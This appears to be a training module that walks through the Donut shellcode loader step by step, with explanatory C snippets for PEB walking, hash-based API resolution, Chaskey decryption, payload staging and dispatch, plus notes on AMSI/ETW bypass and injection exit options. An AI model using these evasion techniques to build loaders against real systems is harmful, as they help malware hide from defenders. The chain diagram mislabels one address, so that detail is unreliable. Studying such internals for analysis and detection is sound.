Difficulty: Intermediate

Module 5: The Donut Loader

Inside the position-independent shellcode loader: PEB walking, API resolution, decryption, decompression, and module-type dispatch.

Module Objective

Trace the complete execution flow of Donut’s PIC loader from the moment shellcode begins executing. Understand how it finds its own data via RIP-relative addressing, resolves Windows APIs by walking the PEB and hashing export names, decrypts the instance and module, and dispatches to the correct payload handler.

1. Position-Independent Code Constraints

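Donut’s loader must execute from any address in memory with zero external dependencies at startup. This means it cannot rely on an import table, on relocations applied by the Windows loader, or on absolute addresses for code or data.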

The loader is written in C and compiled with special flags to produce PIC output. The Donut build system compiles loader.c and its dependencies into a raw code blob that is position-independent.

2. Loader Entry Point

When the shellcode begins executing, the first thing the loader must do is find the DONUT_INSTANCE structure that follows the code. It does this by determining its own address at runtime and adding an offset that was fixed when the shellcode was generated:

// The loader entry point in loader.c
// On x64, we can use RIP-relative addressing
// The DONUT_INSTANCE is appended immediately after the loader code

// Step 1: Determine our base address
// The instance offset is embedded as a constant during generation
PDONUT_INSTANCE inst = (PDONUT_INSTANCE)(
    (BYTE*)_ReturnAddress() + instance_offset
);

// On x86, a call/pop trick is used:
//   call $+5      ; push next instruction address
//   pop  eax      ; eax = current EIP
//   add  eax, offset  ; eax = address of DONUT_INSTANCE

Once the loader has a pointer to DONUT_INSTANCE, it has access to all configuration data, API hashes, and encryption keys.
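The "base address plus build-time offset" idea can be illustrated without any shellcode. The following is a minimal sketch, assuming a hypothetical two-field mock_instance in place of the real DONUT_INSTANCE; build_blob and read_instance are illustrative names and are not part of Donut.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, heavily simplified stand-in for DONUT_INSTANCE. */
typedef struct {
    uint32_t len;
    uint32_t exit_opt;
} mock_instance;

/* Lay out [code bytes][instance] in `out` and return the total size.
 * `out` must have room for code_len + sizeof(mock_instance) bytes. */
size_t build_blob(uint8_t *out, const uint8_t *code, size_t code_len,
                  const mock_instance *inst) {
    assert(out != NULL && code != NULL && inst != NULL);
    memcpy(out, code, code_len);
    memcpy(out + code_len, inst, sizeof *inst);
    return code_len + sizeof *inst;
}

/* Given the blob's runtime base and the offset fixed at build time,
 * copy the instance out. memcpy avoids unaligned struct access. */
mock_instance read_instance(const uint8_t *base, size_t instance_offset) {
    mock_instance inst;
    assert(base != NULL);
    memcpy(&inst, base + instance_offset, sizeof inst);
    return inst;
}
```

The caller only needs two facts: where the blob currently lives and how long the code portion is. Nothing in the lookup depends on the absolute address the blob was loaded at.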

3. PEB Walking for API Resolution

The core problem of PIC programming is finding loaded DLLs and their exports without calling any APIs. The Process Environment Block (PEB) points to loader data (PEB_LDR_DATA) that holds linked lists of all loaded modules.

// peb.c - Walk the PEB to find loaded DLLs and resolve exports

// Step 1: Access the PEB via the TEB
// x64: PEB is at gs:[0x60]
// x86: PEB is at fs:[0x30]
#if defined(_WIN64)
    PPEB peb = (PPEB)__readgsqword(0x60);
#else
    PPEB peb = (PPEB)__readfsdword(0x30);
#endif

// Step 2: Get the loader data (list of loaded modules)
PPEB_LDR_DATA ldr = peb->Ldr;

// Step 3: Walk the InMemoryOrderModuleList
// This circular doubly-linked list has one entry per loaded module
// (the executable itself and every loaded DLL)
PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
PLIST_ENTRY entry = head->Flink;

while (entry != head) {
    PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(
        entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks
    );

    // mod->BaseDllName is a UNICODE_STRING holding the DLL name (e.g., L"kernel32.dll")
    // mod->DllBase is the base address of the loaded DLL
    // Now we can parse this DLL's export table...

    entry = entry->Flink;
}

PEB Walking Chain

TEB (gs:[0x60] on x64, fs:[0x30] on x86)
-> PEB (Process Environment Block)
-> PEB_LDR_DATA (loader data)
-> InMemoryOrderModuleList (linked list of loaded modules)
-> Export Table (function addresses)
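The list walk relies on an intrusive linked list: each module record embeds its link node, and CONTAINING_RECORD subtracts the field offset to get back to the record. The portable sketch below shows the same pattern with mock types, so it runs anywhere. list_entry, mock_module, CONTAINER_OF, and find_module are hypothetical stand-ins, not the Windows definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Stand-in for LIST_ENTRY: a node in a circular doubly-linked list. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Stand-in for CONTAINING_RECORD: recover the enclosing struct
 * from a pointer to one of its fields. */
#define CONTAINER_OF(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* Mock module record; the link is deliberately not the first member. */
typedef struct mock_module {
    const char *name;
    void       *base;
    list_entry  links;
} mock_module;

void list_init(list_entry *head) { head->flink = head->blink = head; }

void list_push_back(list_entry *head, list_entry *node) {
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk from head->flink until we arrive back at head.
 * Returns the module's base pointer, or NULL if the name is not found. */
void *find_module(list_entry *head, const char *name) {
    assert(head != NULL && name != NULL);
    for (list_entry *e = head->flink; e != head; e = e->flink) {
        mock_module *m = CONTAINER_OF(e, mock_module, links);
        if (strcmp(m->name, name) == 0) return m->base;
    }
    return NULL;
}
```

The loop condition mirrors the `while (entry != head)` test in the loader snippet: the list is circular, so reaching the head again means every entry has been visited.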

4. Hash-Based Export Resolution

For each loaded DLL, the loader walks the name table of the export directory and computes a hash of each exported function name. When a hash matches one in the DONUT_INSTANCE.hash[] array, the loader looks up the function's address in the Export Address Table (EAT) and stores it in the api structure.

// Resolve exports from a DLL by hashing function names
VOID ResolveAPIs(PDONUT_INSTANCE inst, HMODULE dll) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)dll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)dll + dos->e_lfanew);

    DWORD exp_rva = nt->OptionalHeader
        .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (exp_rva == 0) return;   // this module has no export directory

    PIMAGE_EXPORT_DIRECTORY exp =
        (PIMAGE_EXPORT_DIRECTORY)((BYTE*)dll + exp_rva);

    // Three parallel tables, all stored as RVAs relative to the DLL base
    DWORD *names    = (DWORD*)((BYTE*)dll + exp->AddressOfNames);
    WORD  *ordinals = (WORD*) ((BYTE*)dll + exp->AddressOfNameOrdinals);
    DWORD *funcs    = (DWORD*)((BYTE*)dll + exp->AddressOfFunctions);

    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        char *name = (char*)((BYTE*)dll + names[i]);

        // Compute hash of this export name
        ULONGLONG hash = ComputeHash(name);

        // Check against all hashes in the instance
        for (DWORD j = 0; j < DONUT_MAX_API; j++) {
            if (inst->hash[j] == hash) {
                // Found a match: names[i] pairs with ordinals[i],
                // which is the index into the function table.
                // Forwarded exports are not handled in this sketch.
                WORD ord = ordinals[i];
                FARPROC addr = (FARPROC)((BYTE*)dll + funcs[ord]);
                ((FARPROC*)&inst->api)[j] = addr;
                break;
            }
        }
    }
}
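The indirection through the ordinals table is easy to get wrong: the i-th name does not map to the i-th function. The sketch below reproduces only that lookup on mock in-memory arrays, without any PE parsing. mock_exports and lookup_export_rva are hypothetical names chosen for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Mock export directory: names[] is sorted by name, and ordinals[i]
 * gives the index into funcs[] for names[i]. */
typedef struct {
    const char * const *names;
    const uint16_t     *ordinals;
    const uint32_t     *funcs;
    uint32_t            number_of_names;
} mock_exports;

/* Return the function RVA for `wanted`, or 0 if it is not exported. */
uint32_t lookup_export_rva(const mock_exports *e, const char *wanted) {
    assert(e != NULL && wanted != NULL);
    for (uint32_t i = 0; i < e->number_of_names; i++) {
        if (strcmp(e->names[i], wanted) == 0) {
            /* name index -> ordinal index -> function RVA */
            return e->funcs[e->ordinals[i]];
        }
    }
    return 0;
}
```

With names {"Alpha", "Beta", "Gamma"}, ordinals {2, 0, 1}, and funcs {0x1000, 0x2000, 0x3000}, looking up "Alpha" yields 0x3000 rather than 0x1000, because its ordinal entry points at the third function slot.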

The Hashing Algorithm

Donut uses a custom hash function (Maru hash) that combines the DLL name and the function name into a single 64-bit value. Including the DLL name avoids collisions across modules: kernel32!VirtualAlloc and a hypothetical ntdll!VirtualAlloc would produce different hashes.

5. Instance Decryption

After resolving the minimum required APIs, the loader decrypts the DONUT_INSTANCE using a key and counter that were generated when the shellcode was built:

// Decrypt the DONUT_INSTANCE using Chaskey in CTR mode
// CTR mode is symmetric, so the encrypt routine also decrypts
// The key and counter are read here from inst->key and inst->ctr
chaskey_encrypt(
    inst->key,       // Chaskey key (128-bit)
    inst->ctr,       // Counter/nonce (128-bit)
    (BYTE*)inst + offsetof(DONUT_INSTANCE, /* encrypted start */),
    encrypted_size
);

// Verify integrity via MAC
DWORD mac = ComputeMAC(inst, inst_size);
if (mac != inst->mac) {
    // Decryption failed or data corrupted - abort
    return;
}

Once decrypted, the instance reveals the full API hash table, the module decryption key, bypass configuration, and all other runtime parameters.
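The decryption step calls an encrypt routine because CTR mode only XORs the data with a keystream, so applying it twice with the same key and counter restores the original bytes. The sketch below demonstrates that property with a toy keystream function. toy_block is an insecure stand-in based on a generic 64-bit mixer, not Chaskey, and all names here are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy stand-in for a block cipher: mixes key and counter into 64 bits.
 * NOT secure and NOT Chaskey; for illustrating CTR mode only. */
static uint64_t toy_block(uint64_t key, uint64_t counter) {
    uint64_t z = key + counter * 0x9e3779b97f4a7c15ULL;
    z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
    z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
    return z ^ (z >> 31);
}

/* CTR mode: XOR data with a keystream derived from (key, counter).
 * The same call both encrypts and decrypts. */
void toy_ctr_crypt(uint64_t key, uint64_t counter, uint8_t *data, size_t len) {
    uint64_t ks = 0;
    assert(data != NULL || len == 0);
    for (size_t i = 0; i < len; i++) {
        if (i % 8 == 0) ks = toy_block(key, counter++);  /* next keystream block */
        data[i] ^= (uint8_t)(ks >> (8 * (i % 8)));
    }
}

/* Returns 1 if encrypting changes the buffer and a second pass restores it. */
int ctr_roundtrip_ok(void) {
    uint8_t buf[13] = "hello, donut";
    uint8_t orig[13];
    memcpy(orig, buf, sizeof buf);

    toy_ctr_crypt(1234, 0, buf, sizeof buf);
    if (memcmp(buf, orig, sizeof buf) == 0) return 0;  /* should differ */

    toy_ctr_crypt(1234, 0, buf, sizeof buf);
    return memcmp(buf, orig, sizeof buf) == 0;         /* should match again */
}
```

The same reasoning explains why a wrong key or counter cannot be detected by the cipher itself: the XOR always "succeeds", which is why the loader verifies a MAC after decrypting.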

6. Module Decryption and Decompression

With the instance decrypted and APIs resolved, the loader proceeds to decrypt and decompress the DONUT_MODULE:

// Locate the module (either embedded or downloaded via staging)
PDONUT_MODULE mod;

if (inst->type == DONUT_INSTANCE_EMBED) {
    // Module is embedded after the instance
    mod = (PDONUT_MODULE)((BYTE*)inst + inst->mod_offset);
} else {
    // Download the module via HTTP or DNS staging
    mod = DownloadModule(inst);
}

// Decrypt the module with the module-specific key
chaskey_encrypt(
    inst->mod_key,
    inst->mod_ctr,
    (BYTE*)mod,
    inst->mod_len
);

// Decompress based on the compression engine
LPVOID payload = NULL;
if (mod->compress == DONUT_COMPRESS_APLIB ||
    mod->compress == DONUT_COMPRESS_LZNT1) {
    // Allocate a buffer large enough for the decompressed payload
    payload = inst->api.VirtualAlloc(
        NULL, mod->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (payload == NULL) return;   // allocation failed - abort

    if (mod->compress == DONUT_COMPRESS_APLIB) {
        aP_depack(mod->data, payload);
    } else {
        ULONG final_size;
        inst->api.RtlDecompressBuffer(
            COMPRESSION_FORMAT_LZNT1,
            payload, mod->len,      // destination buffer and its size
            mod->data, mod->zlen,   // compressed source and its size
            &final_size
        );
    }
} else {
    // No compression: data is the raw payload
    payload = mod->data;
}

7. Module-Type Dispatch

After decryption and decompression, the loader checks the module type and calls the appropriate handler:

// Dispatch based on module type
switch (mod->type) {
    case DONUT_MODULE_NET_DLL:
    case DONUT_MODULE_NET_EXE:
        // .NET payload: host CLR, load assembly, invoke
        RunDotNET(inst, mod, payload);
        break;

    case DONUT_MODULE_DLL:
    case DONUT_MODULE_EXE:
        // Native PE: map sections, relocate, resolve imports, execute
        RunPE(inst, mod, payload);
        break;

    case DONUT_MODULE_VBS:
    case DONUT_MODULE_JS:
    case DONUT_MODULE_XSL:
        // Script: create COM scripting engine, execute
        RunScript(inst, mod, payload);
        break;
}

Complete Loader Execution Flow

Find Instance (RIP-relative)
-> PEB Walk (resolve APIs)
-> Decrypt Instance (Chaskey)
-> AMSI/ETW Bypass (patch stubs)
-> Decrypt Module (Chaskey)
-> Decompress (aPLib/LZNT1)
-> Dispatch (PE/CLR/COM)

8. Exit Handling

After the payload finishes executing, the loader must clean up and exit. The exit behavior is configurable via DONUT_INSTANCE.exit_opt:

Exit Option | Constant | Behavior
Exit Thread | DONUT_OPT_EXIT_THREAD | Calls ExitThread(0); only the current thread terminates
Exit Process | DONUT_OPT_EXIT_PROCESS | Calls ExitProcess(0); the entire process terminates
No Exit | DONUT_OPT_EXIT_BLOCK | The loader returns normally, allowing the caller to continue

Exit Option Matters

Choosing the wrong exit option can crash the target process or leave zombie threads. Exit Thread is safest for injection scenarios (the host process continues). Exit Process is useful for sacrificial processes. No Exit / Block is best when the loader is called from your own code and you want control to return.

Knowledge Check

1. How does the PIC loader find loaded DLLs without calling any Windows APIs?

The PEB (accessed via gs:[0x60] on x64 or fs:[0x30] on x86) contains a pointer to PEB_LDR_DATA, which has a linked list of all loaded modules. The loader traverses this list to find DLLs like kernel32.dll and ntdll.dll, then parses their export tables.

2. Why does Donut use hash-based API resolution instead of plaintext strings?

Plaintext API strings like "VirtualAlloc" or "CreateRemoteThread" in shellcode are trivial to detect with static analysis and YARA rules. By storing only hashes, Donut avoids these signatures. The loader computes hashes of export names at runtime and compares them against the pre-computed values.

3. What is the first thing the Donut loader must do after execution begins?

It must locate the DONUT_INSTANCE. The loader cannot do anything useful until it finds this structure, which contains all configuration data, API hashes, and encryption keys. It locates the instance using RIP-relative addressing (x64) or a call/pop trick (x86) combined with a known offset.